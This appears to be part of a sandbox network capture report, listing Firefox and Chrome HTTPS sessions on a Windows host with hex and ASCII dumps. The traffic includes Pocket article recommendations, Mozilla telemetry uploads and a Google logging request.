2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 25 32 46 62 30 38 35 31 66 30 33 2d 62 66 61 33 2d 34 64 38 36 2d 38 64 30 62 2d 34 35 64 65 31 34 31 36 62 37 39 38 2e 6a 70 65 67 26 72 65 73 69 7a 65 3d 77 34 35 30 22 7d 2c 7b 22 69 64 22 3a 31 32 36 39 31 30 35 38 33 31 31 36 30 34 39 31 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 72 65 64 2e 63 6f 6d 2f 73 74 6f 72 79 2f 61 6d 6f 63 2d 63 6f 6c 6c 61 70 73 65 2d 61 74 6c 61 6e 74 69 63 2d 6f 63 65 61 6e 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 48 6f 77 20 Data Ascii: 3.us-east-1.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0851f03-bfa3-4d86-8d0b-45de1416b798.jpeg&resize=w450"},{"id":1269105831160491,"url":"https://www.wired.com/story/amoc-collapse-atlantic-ocean/?utm_source=pocket-newtab-en-us","title":"How
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 70 72 6f 64 2d 69 6d 61 67 65 73 2f 37 37 61 36 30 33 38 66 2d 39 65 66 65 2d 34 63 37 34 2d 39 39 39 37 2d 63 63 61 65 64 39 61 62 34 66 63 30 2e 6a 70 65 67 22 2c 22 69 6d 61 67 65 5f 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2d 67 65 74 70 6f 63 6b 65 74 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 64 69 72 65 63 74 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 25 32 46 37 37 61 36 30 33 38 66 2d 39 65 66 65 2d 34 63 37 34 2d 39 39 39 37 2d 63 63 61 65 64 39 61 62 34 66 63 30 2e 6a 70 65 67 26 72 65 73 69 7a 65 3d 77 34 35 30 22 7d 2c 7b Data Ascii: prod-images/77a6038f-9efe-4c74-9997-ccaed9ab4fc0.jpeg","image_src":"https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F77a6038f-9efe-4c74-9997-ccaed9ab4fc0.jpeg&resize=w450"},{
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 67 65 5f 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 2f 65 32 62 35 34 35 38 38 2d 63 65 31 63 2d 34 30 65 35 2d 62 61 39 36 2d 62 62 62 66 66 61 66 38 64 34 66 30 2e 6a 70 65 67 22 2c 22 69 6d 61 67 65 5f 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2d 67 65 74 70 6f 63 6b 65 74 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 64 69 72 65 63 74 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f Data Ascii: ge_src":"https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/e2b54588-ce1c-40e5-ba96-bbbffaf8d4f0.jpeg","image_src":"https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-curatedcorpusapi-pro
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 74 74 70 73 3a 2f 2f 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 2f 65 62 36 66 34 36 31 31 2d 39 35 66 61 2d 34 31 63 32 2d 39 62 33 30 2d 61 39 32 39 34 32 66 35 35 65 30 62 2e 6a 70 65 67 22 2c 22 69 6d 61 67 65 5f 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2d 67 65 74 70 6f 63 6b 65 74 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 64 69 72 65 63 74 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 25 32 Data Ascii: ttps://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/eb6f4611-95fa-41c2-9b30-a92942f55e0b.jpeg","image_src":"https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2
2024-07-26 18:10:51 UTC	1390	IN	Data Raw: 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 2f 33 61 62 33 33 31 39 30 2d 66 64 35 32 2d 34 33 64 34 2d 62 31 63 37 2d 31 36 35 62 64 30 31 39 39 30 39 63 2e 6a 70 65 67 22 2c 22 69 6d 61 67 65 5f 73 72 63 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2d 67 65 74 70 6f 63 6b 65 74 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 64 69 72 65 63 74 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 25 32 46 33 61 62 33 33 31 39 30 2d 66 Data Ascii: s-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/3ab33190-fd52-43d4-b1c7-165bd019909c.jpeg","image_src":"https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3ab33190-f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	64168	34.149.97.1	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:54 UTC	363	OUT	GET /desktop/v1/recommendations?locale=en-US&region=US&count=30 HTTP/1.1 Host: firefox-api-proxy.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br consumer_key: 94110-6d5ff7a89d72c869766af0e0 Connection: keep-alive
2024-07-26 18:10:54 UTC	377	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 18254 X-Powered-By: Express Via: 1.1 google Date: Fri, 26 Jul 2024 16:28:59 GMT Age: 6115 ETag: W/"474e-NwBXxLIlvR8G9EW1+H/MrRs9mOg" Content-Type: application/json; charset=utf-8 Vary: Accept-Encoding Cache-Control: public,max-age=900,public Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:54 UTC	1013	IN	Data Raw: 7b 22 64 61 74 61 22 3a 5b 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 22 2c 22 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 49 64 22 3a 22 38 37 37 33 63 61 30 30 2d 62 63 32 36 2d 34 37 38 35 2d 38 36 64 64 2d 34 31 62 31 38 35 61 34 64 31 34 33 22 2c 22 74 69 6c 65 49 64 22 3a 31 32 36 39 31 30 35 38 33 31 31 36 30 34 39 31 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 72 65 64 2e 63 6f 6d 2f 73 74 6f 72 79 2f 61 6d 6f 63 2d 63 6f 6c 6c 61 70 73 65 2d 61 74 6c 61 6e 74 69 63 2d 6f 63 65 61 6e 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 48 6f 77 20 53 6f 6f 6e 20 4d 69 67 68 74 20 74 68 65 20 41 74 6c 61 6e 74 Data Ascii: {"data":[{"__typename":"Recommendation","recommendationId":"8773ca00-bc26-4785-86dd-41b185a4d143","tileId":1269105831160491,"url":"https://www.wired.com/story/amoc-collapse-atlantic-ocean/?utm_source=pocket-newtab-en-us","title":"How Soon Might the Atlant
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 74 22 3a 22 54 68 65 20 46 2d 31 31 37 20 68 61 64 20 65 78 74 65 6e 64 61 62 6c 65 20 61 6e 74 65 6e 6e 61 20 66 61 72 6d 73 20 74 68 61 74 20 63 6f 75 6c 64 20 64 65 74 65 63 74 20 61 6e 64 20 70 6f 73 73 69 62 6c 79 20 6c 6f 63 61 74 65 20 65 6e 65 6d 79 20 72 61 64 61 72 20 65 6d 69 74 74 65 72 73 e2 80 94 6f 72 20 64 69 64 20 69 74 3f 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 54 68 65 20 57 61 72 20 5a 6f 6e 65 22 2c 22 69 6d 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 2f 62 31 64 61 38 61 38 65 2d 30 37 64 37 2d 34 37 38 38 2d 61 37 35 30 2d 62 34 34 34 64 35 62 39 34 30 34 39 2e 6a 70 Data Ascii: t":"The F-117 had extendable antenna farms that could detect and possibly locate enemy radar emittersor did it?","publisher":"The War Zone","imageUrl":"https://s3.amazonaws.com/pocket-curatedcorpusapi-prod-images/b1da8a8e-07d7-4788-a750-b444d5b94049.jp
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 6f 6d 6d 65 6e 64 61 74 69 6f 6e 22 2c 22 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 49 64 22 3a 22 62 38 31 61 33 37 36 62 2d 30 65 33 62 2d 34 33 65 64 2d 62 38 39 61 2d 36 36 36 66 64 34 65 64 37 65 64 34 22 2c 22 74 69 6c 65 49 64 22 3a 35 34 38 37 39 31 39 38 35 38 33 34 35 37 32 33 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 65 7a 65 62 65 6c 2e 63 6f 6d 2f 68 61 76 65 2d 74 68 65 2d 6f 6c 79 6d 70 69 63 2d 62 65 64 73 2d 61 6c 77 61 79 73 2d 62 65 65 6e 2d 74 68 69 73 2d 62 61 64 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 48 61 76 65 20 74 68 65 20 4f 6c 79 6d 70 69 63 20 42 65 64 73 20 41 6c 77 61 79 73 20 42 65 65 6e 20 54 68 69 73 20 42 61 64 3f Data Ascii: ommendation","recommendationId":"b81a376b-0e3b-43ed-b89a-666fd4ed7ed4","tileId":5487919858345723,"url":"https://www.jezebel.com/have-the-olympic-beds-always-been-this-bad?utm_source=pocket-newtab-en-us","title":"Have the Olympic Beds Always Been This Bad?
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 65 6e e2 80 99 73 20 61 72 74 69 73 74 69 63 20 67 79 6d 6e 61 73 74 69 63 73 20 63 61 70 74 75 72 65 73 20 74 68 65 20 77 6f 72 6c 64 e2 80 99 73 20 61 74 74 65 6e 74 69 6f 6e 2c 20 61 6e 64 20 73 70 6f 72 74 73 20 65 6e 74 68 75 73 69 61 73 74 73 20 65 76 65 72 79 77 68 65 72 65 20 73 75 64 64 65 6e 6c 79 20 68 61 76 65 20 65 78 70 65 72 74 20 6f 70 69 6e 69 6f 6e 73 20 6f 6e 20 77 6f 6c 66 20 74 75 72 6e 73 2c 20 41 6d 61 6e 61 72 73 2c 20 61 6e 64 2c 20 6f 66 20 63 6f 75 72 73 65 2c 20 53 69 6d 6f 6e 65 20 42 69 6c 65 73 2e 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 42 75 73 74 6c 65 22 2c 22 69 6d 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d Data Ascii: ens artistic gymnastics captures the worlds attention, and sports enthusiasts everywhere suddenly have expert opinions on wolf turns, Amanars, and, of course, Simone Biles.","publisher":"Bustle","imageUrl":"https://s3.us-east-1.amazonaws.com/pocket-
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 3f 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 42 42 43 20 4e 65 77 73 22 2c 22 69 6d 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 2f 64 33 32 32 38 36 64 63 2d 38 63 32 64 2d 34 65 65 65 2d 62 66 30 36 2d 35 64 65 37 33 36 30 34 38 36 63 36 2e 6a 70 65 67 22 7d 2c 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 22 2c 22 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 49 64 22 3a 22 62 62 62 63 66 32 61 35 2d 64 66 32 62 2d 34 35 62 64 2d 61 30 62 66 2d 32 66 65 61 63 64 36 62 35 33 34 37 22 2c 22 74 69 6c 65 49 64 22 3a 31 36 32 33 Data Ascii: ?","publisher":"BBC News","imageUrl":"https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/d32286dc-8c2d-4eee-bf06-5de7360486c6.jpeg"},{"__typename":"Recommendation","recommendationId":"bbbcf2a5-df2b-45bd-a0bf-2feacd6b5347","tileId":1623
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 2e 70 6e 67 22 7d 2c 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 22 2c 22 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 49 64 22 3a 22 37 64 34 35 36 37 32 64 2d 38 30 66 36 2d 34 65 34 36 2d 38 64 62 66 2d 64 32 31 33 64 34 36 63 62 34 66 62 22 2c 22 74 69 6c 65 49 64 22 3a 37 34 39 33 34 32 35 33 38 34 38 37 38 37 36 33 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 70 6f 63 6b 65 74 2e 63 6f 6d 2f 65 78 70 6c 6f 72 65 2f 69 74 65 6d 2f 64 6f 2d 79 6f 75 2d 68 61 76 65 2d 61 2d 73 68 61 64 6f 77 2d 73 69 64 65 2d 74 68 65 2d 70 73 79 63 68 6f 6c 6f 67 79 2d 6f 66 2d 77 68 79 2d 77 65 2d 66 69 6e 64 2d 73 6f 6d 65 2d 70 65 6f 70 6c 65 2d 69 6e 65 78 70 6c 69 63 61 62 6c 79 2d 61 6e 6e 6f 79 69 6e 67 3f 75 Data Ascii: .png"},{"__typename":"Recommendation","recommendationId":"7d45672d-80f6-4e46-8dbf-d213d46cb4fb","tileId":7493425384878763,"url":"https://getpocket.com/explore/item/do-you-have-a-shadow-side-the-psychology-of-why-we-find-some-people-inexplicably-annoying?u
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 2e 70 6f 70 73 75 67 61 72 2e 63 6f 6d 2f 63 61 72 65 65 72 73 2f 67 65 6e 2d 7a 2d 77 6f 72 6b 2d 65 74 68 69 63 2d 34 39 33 37 39 32 30 30 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 55 6e 70 61 63 6b 69 6e 67 20 74 68 65 20 57 6f 72 6b 70 6c 61 63 65 20 44 69 76 69 64 65 20 42 65 74 77 65 65 6e 20 47 65 6e 20 5a 20 61 6e 64 20 4d 69 6c 6c 65 6e 6e 69 61 6c 73 22 2c 22 65 78 63 65 72 70 74 22 3a 22 57 68 65 6e 20 61 20 6e 65 77 20 67 65 6e 65 72 61 74 69 6f 6e 20 65 6e 74 65 72 73 20 74 68 65 20 77 6f 72 6b 66 6f 72 63 65 2c 20 74 68 65 72 65 20 61 72 65 20 69 6e 65 76 69 74 61 62 6c 65 20 67 72 6f 77 69 6e 67 20 70 61 69 6e 73 3a 20 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e Data Ascii: .popsugar.com/careers/gen-z-work-ethic-49379200?utm_source=pocket-newtab-en-us","title":"Unpacking the Workplace Divide Between Gen Z and Millennials","excerpt":"When a new generation enters the workforce, there are inevitable growing pains: communication
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 74 6f 20 73 74 72 69 6b 65 20 74 68 65 20 72 69 67 68 74 20 62 61 6c 61 6e 63 65 20 62 65 74 77 65 65 6e 20 71 75 61 6e 74 69 74 79 20 61 6e 64 20 71 75 61 6c 69 74 79 20 66 6f 72 20 6d 6f 72 65 20 72 6f 62 75 73 74 20 72 65 73 74 2e 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 56 6f 67 75 65 22 2c 22 69 6d 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 70 69 2d 70 72 6f 64 2d 69 6d 61 67 65 73 2f 64 62 32 37 37 35 36 65 2d 30 62 63 33 2d 34 65 39 36 2d 61 32 61 34 2d 30 37 36 31 39 38 35 38 33 62 63 39 2e 6a 70 65 67 22 7d 2c 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f Data Ascii: to strike the right balance between quantity and quality for more robust rest.","publisher":"Vogue","imageUrl":"https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusapi-prod-images/db27756e-0bc3-4e96-a2a4-076198583bc9.jpeg"},{"__typename":"Recommendatio
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 64 64 32 64 35 2e 6a 70 65 67 22 7d 2c 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 22 2c 22 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 49 64 22 3a 22 31 39 30 66 65 35 39 39 2d 61 62 34 30 2d 34 32 32 39 2d 39 36 61 64 2d 36 33 39 34 32 64 64 36 37 61 61 61 22 2c 22 74 69 6c 65 49 64 22 3a 36 35 35 38 32 39 36 30 30 39 37 37 37 30 30 36 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 74 61 6b 65 6f 75 74 2e 63 6f 6d 2f 31 36 32 32 35 35 33 2f 69 63 65 2d 63 75 62 65 2d 73 65 63 72 65 74 2d 69 6e 67 72 65 64 69 65 6e 74 2d 67 72 69 6c 6c 65 64 2d 63 68 65 65 73 65 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 48 Data Ascii: dd2d5.jpeg"},{"__typename":"Recommendation","recommendationId":"190fe599-ab40-4229-96ad-63942dd67aaa","tileId":6558296009777006,"url":"https://www.thetakeout.com/1622553/ice-cube-secret-ingredient-grilled-cheese/?utm_source=pocket-newtab-en-us","title":"H
2024-07-26 18:10:54 UTC	1390	IN	Data Raw: 6f 6e 2d 69 74 2d 64 65 73 65 72 76 65 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 6f 63 6b 65 74 2d 6e 65 77 74 61 62 2d 65 6e 2d 75 73 22 2c 22 74 69 74 6c 65 22 3a 22 54 68 69 73 20 43 6f 7a 79 20 4e 36 34 20 43 6c 61 73 73 69 63 20 48 61 73 20 46 69 6e 61 6c 6c 79 20 47 6f 74 74 65 6e 20 54 68 65 20 52 65 63 6f 67 6e 69 74 69 6f 6e 20 49 74 20 44 65 73 65 72 76 65 73 22 2c 22 65 78 63 65 72 70 74 22 3a 22 47 6f 20 62 61 63 6b 20 74 6f 20 6c 6f 77 2d 72 65 73 20 6e 61 74 75 72 65 2e 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 22 49 6e 76 65 72 73 65 22 2c 22 69 6d 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 6f 63 6b 65 74 2d 63 75 72 61 74 65 64 63 6f 72 70 75 73 61 Data Ascii: on-it-deserves?utm_source=pocket-newtab-en-us","title":"This Cozy N64 Classic Has Finally Gotten The Recognition It Deserves","excerpt":"Go back to low-res nature.","publisher":"Inverse","imageUrl":"https://s3.us-east-1.amazonaws.com/pocket-curatedcorpusa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	64176	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:56 UTC	618	OUT	POST /submit/firefox-desktop/events/1/a41b546f-2a45-4575-b7b2-1924bcfe3e10 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-encoding: gzip content-type: application/json; charset=utf-8 content-length: 796 date: Fri, 26 Jul 2024 19:27:22 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:10:56 UTC	796	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff cd 54 cb 6e eb 36 10 fd 17 6d af 69 50 34 f5 dc 76 d5 75 53 74 51 14 c2 90 1a c9 44 69 52 97 a4 92 18 81 ff bd 43 d9 75 9c 20 7d a0 ab 02 82 41 cf e3 cc 99 e7 5b b1 18 37 0f c6 4d be e8 df 8a 88 df 8b be dc 15 31 41 48 43 32 27 2c fa 42 70 71 60 25 67 5c 3e 95 b2 97 fc 1b 2f 7b ce 8b 5d 81 6e 7c b0 91 8c 37 4c d4 4f 65 d5 8b 86 8c af 36 01 21 7a 47 16 1b e4 ba 64 b7 d7 05 03 b9 b9 14 af 31 c3 c2 60 64 09 2d 9e 30 85 33 0b de 5a bf a6 ac 54 01 9c 3e 92 bb f6 2e 91 7c 73 4f 01 b2 2e 9d 97 1c da 99 93 5a e3 dd 29 d3 ca ef 8c ff e3 48 7a 39 a9 aa eb 14 71 53 13 32 c9 27 60 80 fa c0 2a 55 95 a3 1e 71 aa 2b 51 5c 2e bb 62 5d e6 00 23 b2 b8 f8 64 cd 7c 4c 5f 12 49 94 51 ca e0 ff 81 ca 01 51 97 2d 11 10 bc 6e 88 4a 2b 58 27 2a 64 9d Data Ascii: Tn6miP4vuStQDiRCu }A[7M1AHC2',Bpq`%g\>/{]n\|7LOe6!zGd1`d-03ZT>.\|sO.Z)Hz9qS2'`Uq+Q\.b]#d\|L_IQQ-nJ+X'd
2024-07-26 18:10:56 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:10:56 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	64182	142.250.185.142	443	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:58 UTC	1285	OUT	POST /log?hasfast=true&authuser=0&format=json HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 828 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=516=e89aBvmChtHpemxl3AqwvQ3O2SmlslwrossQb4bW-fcR88JkrNiiCRD2XlmD8aNhQohO9n_WwkMwUms8yEfALYDLmN3ol94i8o6zC591MYGydQoKybYXAysyWdB6CpJaEyeWPd2yAvPBT2O977LZ8R8LbSuyEGszcmd9vay_qgz_sAU
2024-07-26 18:10:58 UTC	828	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 69 64 65 6e 74 69 74 79 66 72 6f 6e 74 65 6e 64 61 75 74 68 75 69 73 65 72 76 65 72 5f 32 30 32 34 30 37 32 33 2e 30 30 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 